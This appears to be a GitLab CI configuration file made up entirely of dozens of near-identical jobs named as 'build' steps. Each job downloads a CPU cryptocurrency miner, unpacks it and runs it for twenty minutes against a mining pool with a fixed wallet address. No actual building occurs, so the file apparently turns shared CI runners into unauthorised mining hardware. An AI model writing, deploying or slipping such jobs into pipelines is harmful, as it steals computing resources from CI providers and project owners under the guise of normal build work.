    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erdferety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eredfy5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2edfwty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eretyddde5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ereddty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ersety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erxety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ercety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erhety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2efgrety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erdety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eredsty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erefety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erfdety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erecty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eddrety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eretfffy5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eretffy5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eretddy5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erfgfety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ergfety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1

build_2sefrety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2eregty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2erfgety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2efety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2retfdy5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_erety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_ety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ety5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_ery5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ey5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2edsty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ty5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ery5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
build_2ere5:
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.19/cpuminer-opt-linux.tar.gz
    - tar xf cpuminer-opt-linux.tar.gz
    - timeout 20m ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1q9mqzyxjeg7lldutxg3na4spaqrjyhcznmhfctm.oppa24 -t1
    
    
    
   
    